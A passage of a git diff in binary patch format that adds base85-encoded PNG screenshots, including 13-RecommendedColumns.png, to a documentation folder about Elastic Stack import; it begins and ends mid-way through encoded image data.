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
H$LoIqV%gpQ

literal 0
HcmV?d00001

diff --git a/doc/ElasticStackImport/13-RecommendedColumns.png b/doc/ElasticStackImport/13-RecommendedColumns.png
new file mode 100644
index 0000000000000000000000000000000000000000..20ec3a29ff04ab9a73ebc962ab468c5ea9c8fc0d
GIT binary patch
literal 98959
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
